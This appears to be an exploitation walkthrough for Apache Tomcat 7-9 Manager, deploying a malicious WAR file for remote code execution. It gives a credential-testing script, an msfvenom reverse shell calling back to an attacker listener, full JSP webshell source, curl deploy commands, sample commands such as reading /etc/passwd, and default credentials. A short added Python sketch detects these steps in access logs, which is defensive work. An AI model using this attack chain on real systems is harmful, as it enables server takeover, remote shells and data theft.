Apache Tomcat 7-9 Manager RCE via WAR deployment - Exploit authenticated access to deploy malicious WAR files for remote code execution

Exploitation Steps

1. Test API Access & Validate Credentials

# Set variables
USER="tomcat"
PASS="password"
RHOST="10.10.10.194"
RPORT="8080"

# Color codes for output
R='\033[0;31m'
G='\033[0;32m'
C='\033[0;36m'
W='\033[0m'

# Test credentials against manager API
SCODE=$(curl -u "$USER:$PASS" -s -o /dev/null -w "%{http_code}" "http://$RHOST:$RPORT/manager/text")

if [ "$SCODE" = 401 ]; then
    echo -e "$R[-]$C Incorrect Username/Password!$W"
    exit 1
elif [ "$SCODE" = 200 ]; then
    echo -e "$G[+]$C Login Successful!\n$W"
else
    echo "[-] Status Code: $SCODE"
    exit 1
fi

2. Create Malicious WAR File

Option A: Reverse Shell (MSFVenom)

# Generate JSP reverse shell WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war > payload.war

# Start listener
nc -lvnp 4444

Option B: Web Command Shell

Create cmdjsp.jsp:

<%-- Note: on Linux pass cmd directly; on Windows use "cmd.exe /c " + cmd. The method, input name and getParameter name can be changed as well. --%>
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";

if(cmd != null) {
    String s = null;
    try {
        // For Linux, use: exec(cmd)
        // For Windows, use: exec("cmd.exe /C " + cmd)
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while((s = sI.readLine()) != null) {
            output += s + "\n";
        }
    } catch(IOException e) {
        e.printStackTrace();
    }
}
%>

<pre>
<%=output %>
</pre>

Note: bash -c or nc probably won't work with this shell. It is better to use the msfvenom payload, or to upload a shell script through the webshell and then execute it with bash /tmp/shell.sh.

Source: tennc/webshell

Note: Modify for target OS:

  • Linux: Runtime.getRuntime().exec(cmd)
  • Windows: Runtime.getRuntime().exec("cmd.exe /C " + cmd)

3. Package as WAR File

# Create WAR archive (WAR files are just ZIP files)
zip cmdjsp.war cmdjsp.jsp

4. Deploy WAR via Manager API

# Upload and deploy WAR file
curl -T cmdjsp.war -u "$USER:$PASS" "http://$RHOST:$RPORT/manager/text/deploy?path=/app"
# or: curl -u "$USER:$PASS" --upload-file payload.war "http://$RHOST:$RPORT/manager/text/deploy?path=/shell&update=true"
# Expected response:
# OK - Deployed application at context path [/app]

5. Access Deployed Webshell

# Navigate to deployed application
http://$RHOST:$RPORT/app/cmdjsp.jsp

# Execute commands through web interface
# Example: whoami, id, cat /etc/passwd
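
Detection side: steps 1, 4 and 5 each leave a line in Tomcat's access log. The Python sketch below is an added example, not part of the original gist. It assumes the AccessLogValve "common" pattern; the function name analyze, the finding labels and the sample log lines are constructed for illustration.

```python
import re
from collections import Counter

# Tomcat AccessLogValve "common" pattern (assumed): %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+$')
DEPLOY = re.compile(r'^/manager/text/deploy\?(?:.*&)?path=(?P<ctx>/[^&]*)')

# Constructed sample lines (documentation addresses, not from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/2026:10:00:01 +0000] "GET /manager/text HTTP/1.1" 401 2499
192.0.2.10 - - [01/Jun/2026:10:00:02 +0000] "GET /manager/text HTTP/1.1" 401 2499
192.0.2.10 - - [01/Jun/2026:10:00:03 +0000] "GET /manager/text HTTP/1.1" 401 2499
192.0.2.10 - tomcat [01/Jun/2026:10:00:04 +0000] "GET /manager/text HTTP/1.1" 200 27
192.0.2.10 - tomcat [01/Jun/2026:10:00:09 +0000] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 51
192.0.2.10 - - [01/Jun/2026:10:00:15 +0000] "GET /app/cmdjsp.jsp?cmd=id HTTP/1.1" 200 312
198.51.100.7 - - [01/Jun/2026:10:01:00 +0000] "GET /docs/index.html HTTP/1.1" 200 1200
"""

def analyze(log_text, max_failures=3):
    """Return (label, client, detail) findings in the order they appear."""
    failures, deployed, findings = Counter(), set(), []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        host, uri, status = m["host"], m["uri"], m["status"]
        # Step 1: repeated 401s on the manager app suggest credential guessing.
        if uri.startswith("/manager/") and status == "401":
            failures[host] += 1
            if failures[host] == max_failures:
                findings.append(("manager-auth-failures", host, uri))
        # Step 4: an authenticated PUT to the text deploy endpoint. The access
        # log has no response body, so 200 does not prove the deploy succeeded.
        d = DEPLOY.match(uri)
        if d and m["method"] == "PUT" and status == "200":
            deployed.add(d["ctx"])
            findings.append(("war-deploy-request", host, d["ctx"]))
            continue
        # Step 5: a JSP requested under a context path deployed in this log.
        path = uri.split("?", 1)[0]
        if path.endswith(".jsp") and any(path.startswith(c + "/") for c in deployed):
            findings.append(("jsp-in-new-context", host, uri))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A deploy request from any address other than a known build or administration host is worth an alert by itself, before the later JSP request appears.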

Common Default Credentials

tomcat:tomcat
admin:admin
tomcat:s3cret
admin:password

Tested Versions

  • Apache Tomcat 7.x
  • Apache Tomcat 8.x
  • Apache Tomcat 9.x